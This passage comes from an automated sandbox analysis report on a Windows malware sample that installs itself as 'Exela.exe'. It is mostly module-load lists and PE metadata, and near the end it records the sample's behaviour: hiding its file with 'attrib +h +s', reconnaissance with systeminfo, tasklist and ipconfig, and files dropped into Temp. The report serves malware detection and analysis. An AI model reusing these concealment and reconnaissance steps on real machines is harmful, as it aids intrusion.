Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\query.exe Section loaded: regapi.dll
Source: C:\Windows\System32\quser.exe Section loaded: winsta.dll
Source: C:\Windows\System32\quser.exe Section loaded: utildll.dll
Source: C:\Windows\System32\quser.exe Section loaded: samcli.dll
Source: C:\Windows\System32\quser.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static file information: File size 11317024 > 1048576
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: crypto\engine\tb_digest.cENGINE_get_digestcrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancrypto\packet.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: Binary string: tRSA_PRIME_INFOeqdmp1dmq1iqmpprime_infosRSAPrivateKeyRSAPublicKeyhashAlgorithmmaskGenAlgorithmsaltLengthtrailerFieldRSA_PSS_PARAMShashFuncmaskGenFuncpSourceFuncRSA_OAEP_PARAMScompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.2.1built on: Fri Feb 23 00:13:44 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-csg7dlje\src\rust\target\release\deps\cryptography_rust.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986952157.000002DCCEDE0000.00000002.00000001.01000000.00000006.sdmp, Exela.exe, 00000051.00000003.1831588046.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650799388.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1803607087.0000023B784A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-csg7dlje\src\rust\target\release\deps\cryptography_rust.pdbo source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Binary contains a suspicious time stamp
Source: VCRUNTIME140.dll.0.dr Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr Static PE information: section name: UPX2
Source: _rust.pyd.0.dr Static PE information: section name: UPX2
Source: Exela.exe.1.dr Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.81.dr Static PE information: section name: _RDATA
Source: libffi-8.dll.81.dr Static PE information: section name: UPX2
Source: _rust.pyd.81.dr Static PE information: section name: UPX2
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Uses attrib.exe to hide files
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Drops PE files
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\libssl-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_cffi_backend.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_uuid.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\multidict\_multidict.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\python311.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\libffi-8.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_writer.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_helpers.cp311-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80682\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\_MEI67602\libffi-8.dll Jump to dropped file
